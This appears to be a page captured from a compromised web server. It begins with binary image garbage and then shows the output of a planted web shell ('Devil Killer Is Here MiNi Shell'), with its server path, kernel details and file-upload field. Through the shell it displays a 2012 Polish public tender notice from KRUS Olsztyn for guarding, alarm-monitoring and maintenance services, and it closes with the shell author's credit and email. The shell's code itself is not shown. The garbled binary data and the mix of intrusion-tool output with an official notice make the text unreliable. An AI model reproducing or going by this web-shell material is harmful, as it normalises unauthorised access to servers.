JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120927/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120927/368354-N-2012.html

<p class="kh_header"><b>Olsztyn: Świadczenie usług ochrony osób i mienia, monitorowania wraz z konserwacją systemów antywłamaniowych i przeciwpożarowych Kasy Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Olsztynie oraz podległych jednostek terenowych na terenie województwa warmińsko-mazurskiego.</b><br>
<b>Numer ogłoszenia: 368354 - 2012; data zamieszczenia: 27.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kasa Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Olsztynie , ul. Mickiewicza 1, 10-959 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5349771, faks 089 523 67 59.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług ochrony osób i mienia, monitorowania wraz z konserwacją systemów antywłamaniowych i przeciwpożarowych Kasy Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Olsztynie oraz podległych jednostek terenowych na terenie województwa warmińsko-mazurskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług ochrony osób i mienia, monitorowania wraz z konserwacją systemów antywłamaniowych i przeciwpożarowych Kasy Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Olsztynie oraz podległych jednostek terenowych na terenie województwa warmińsko-mazurskiego. 
Przedmiot zamówienia obejmuje:
1) monitoring antywłamaniowy i przeciwpożarowy realizowany w oparciu o istniejące urządzenia techniczne stanowiące własność Zamawiającego wraz z serwisem obejmującym półroczne konserwacje i naprawy urządzeń i instalacji utrzymujących systemy w stałej sprawności eksploatacyjnej w jednostkach wymienionych w załączniku nr 1 i załączniku nr 2 do SIWZ;
2) zintegrowanie systemu alarmowego przeciwpożarowego z systemem antywłamaniowym w oparciu o funkcjonujące w nich urządzenia techniczne stanowiące własność Zamawiającego oraz podłączenie wszystkich jednostek wymienionych w załączniku nr 1 do SIWZ do Centrum Monitorowania za pomocą zamontowanych przez Wykonawcę na jego koszt w obiektach Zamawiającego na czas realizacji umowy niezbędnych urządzeń nadawczych, pozostających własnością Wykonawcy;
3) ewentualne przeniesienie funkcjonujących urządzeń do transmisji sygnału z dotychczasowych do nowych siedzib jednostek organizacyjnych KRUS wymienionych w załączniku nr 1;
4) sporządzenie i uzgodnienie z zamawiającym planów ochrony fizycznej i planów ochrony obiektów poprzez monitoring wraz z opisem sposobu prowadzenia usługi i procedur dla jednostek terenowych wymienionych w załączniku nr 1 SIWZ;
5) objęcie ochroną fizyczną (stacjonarną) Odział Regionalny KRUS w Olsztynie:
                    - w godzinach pracy OR  - pełnioną przez 1 osobę
                    - po godzinach pracy OR - pełnioną przez 2 osoby
                    - całodobowo w dni wolne od pracy - pełnioną przez 2 osoby
Jednostki organizacyjne KRUS pracują 8 godzin dziennie od poniedziałku do piątku w godzinach od 7:15 do 15:15
6) prowadzenie bieżącej dokumentacji dotyczącej:
a) realizowanej ochrony fizycznej (dane dotyczące awarii, sabotażu, wyłączenia i załączenia systemów przez osoby uprawnione poza godzinami pracy),
b) monitoringu antywłamaniowego i przeciwpożarowego (raporty z interwencji grup interwencyjnych oraz załączeń i wyłączeń systemów alarmowych przez uprawnione osoby),
c) konserwacji urządzeń i instalacji systemów alarmowych (zakres czynności - zał. nr 2 do SIWZ) wraz z przekazywaniem Zamawiającemu półrocznych potwierdzeń funkcjonowania systemów i realizacji usługi konserwacji i ochrony fizycznej.
Wykonawca zobowiązuje się w zakresie monitorowania systemów antywłamaniowych i przeciwpożarowych w szczególności do:
1) zapewnienia natychmiastowego nie później niż w ciągu 15 minut dojazdu grupy interwencyjnej do chronionego obiektu po otrzymaniu sygnału alarmowego,
2) podejmowania interwencji każdorazowo w przypadku naruszeń stref chronionych, obiektów oraz w niżej wymienionych sytuacjach szczególnego zagrożenia:
a) rabunek lub kradzież z włamaniem,
b) wybuch lub zagrożenie wybuchem w obiektach chronionych,
c) napad na osoby znajdujące się na terenie obiektów chronionych,
d) pożar na terenie chronionych obiektów lub inne zdarzenia losowe.

Uprawnienia i obowiązki pracownika ochrony obejmują w szczególności:
1) ujęcie osób schwytanych na gorącym uczynku albo podejrzanych o popełnienie przestępstwa na terenie chronionym w celu bezzwłocznego przekazania organom powołanym do ścigania przestępstw,
2) niezwłoczne powiadomienie odpowiednich służb oraz kierownictwa Zamawiającego o pożarze lub awarii i podejmowanie działań zmierzających do zmniejszenia strat,
3) udzielanie interesantom informacji o umiejscowieniu sali obsługi interesantów itp. (w jednostkach z ochroną fizyczną),
4) wydawania kluczy do pomieszczeń za pokwitowaniem w Oddziale KRUS w Olsztynie według indywidualnych uzgodnień,
5) łączenie rozmów telefonicznych po godzinach pracy Urzędu oraz w razie potrzeby i możliwości w czasie pracy,
6) reagowanie na różne aspekty wandalizmu na terenie Oddziału 
7) dbałość o bezpieczeństwo na całej posesji,
8) dokonywanie obchodu terenu chronionego.
9) zapewnienie zimowego utrzymania (odśnieżanie, odkuwanie lodu, posypywanie piaskiem) parkingów, dróg wewnętrznych, ciągów pieszych, schodów, podestów, drzwi głównych i ewakuacyjnych, wejść prowadzących do garaży oraz innych pomieszczeń zawierające urządzenia techniczne w okresie od 1 listopada do 31 marca (dotyczy tylko OR KRUS w Olsztynie)

Realizacja przedmiotu zamówienia polega w szczególności na jego zorganizowaniu, prowadzeniu i nadzorowaniu.

Pracownicy ochrony fizycznej i grup interwencyjnych muszą być:
1) umundurowani i wyposażeni w środki przymusu bezpośredniego wynikające z przepisów ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz.U. z. 2005 r., Nr 145, poz. 1221 z późn. zm.) oraz posiadać odpowiednie licencje I i II stopnia,
2) wyposażeni w środki łączności bezprzewodowej oraz posiadać identyfikatory.

Wykaz jednostek KRUS objętych przedmiotem zamówienia wraz z zestawieniem istniejących zabezpieczeń będących własnością Zamawiającego i zakresem usług zawiera załącznik nr 1 i załącznik nr 2 do SIWZ.
Zamawiający wymaga, aby usługi stanowiące przedmiot zamówienia były świadczone przez Wykonawcę posiadającego certyfikat jakości ISO 9001:2000 lub AQAP lub inny równoważny..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1, 50.32.41.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony jeżeli Wykonawca wykaże, że posiada ważną koncesję na wykonywanie działalności w zakresie usług ochrony osób i mienia, zgodnie z art. 15 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz.U. 2005 r. Nr 145, poz. 1221);</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje co najmniej jedną usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, wartość świadczonej usługi powinna odpowiadać minimum 500.000,00 PLN brutto, Wykonawcy potwierdzą warunek składając wypełniony załącznik nr 6</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną stacją monitorowania alarmów obejmujący swoim zasięgiem obszar całego województwa warmińsko-mazurskiego oraz dysponuje co najmniej 4 osobami przewidzianymi do realizacji przedmiotu zamówienia w zakresie ochrony fizycznej posiadającymi licencję pracownika ochrony fizycznej pierwszego stopnia oraz co najmniej 2 osobami posiadającymi licencję pracownika ochrony fizycznej drugiego stopnia. Wykonawcy potwierdzą warunek składając wypełniony załącznik nr 7</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną stacją monitorowania alarmów obejmujący swoim zasięgiem obszar całego województwa warmińsko-mazurskiego oraz dysponuje co najmniej 4 osobami przewidzianymi do realizacji przedmiotu zamówienia w zakresie ochrony fizycznej posiadającymi licencję pracownika ochrony fizycznej pierwszego stopnia oraz co najmniej 2 osobami posiadającymi licencję pracownika ochrony fizycznej drugiego stopnia. Wykonawcy potwierdzą warunek składając wypełniony załącznik nr 7</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony jeżeli Wykonawca wykaże, że posiada polisę ubezpieczenią od odpowiedzialności cywilnej w zakresie ochrony osób i mienia z sumą gwarancyjną nie mniejszą niż 500.000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) oryginał pełnomocnictwa (pełnomocnictw), jeśli oferta nie jest podpisana przez osoby upoważnione do reprezentowania Wykonawcy lub gdy z innych wymaganych dokumentów nie wynika upoważnienie do reprezentowania;
2) oświadczenie Wykonawcy wskazujące, którą część zamówienia powierzy wykonaniu przez podwykonawców, (składane tylko w przypadku, gdy Wykonawca przewiduje udział podwykonawców);
3) parafowany przez Wykonawcę formularz postanowień umowy - zgodny ze wzorem stanowiącym załącznik nr 8 do SIWZ;
4) wypełniony formularz ofertowy - zgodny ze wzorem stanowiącym załącznik nr 3 do SIWZ wraz z wymaganymi dokumentami, oświadczeniami, załącznikami oraz zaświadczeniami;
5) jeżeli o zamówienie Wykonawcy ubiegają się wspólnie lub prowadzą działalność w formie spółki cywilnej - dokument potwierdzający ustanowienie przez Wykonawców pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
6) kopię certyfikatu ISO 9001:2000 lub AQAP lub innego równoważnego;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, może być dokonana w formie pisemnej tylko w przypadku zmiany siedziby Placówki Terenowej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krus.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Mickiewicza 1, 10-698 Olsztyn, pokój 36.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2012 godzina 10:00, miejsce: ul. Mickiewicza 1 10-698 Olsztyn, pokój 36.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com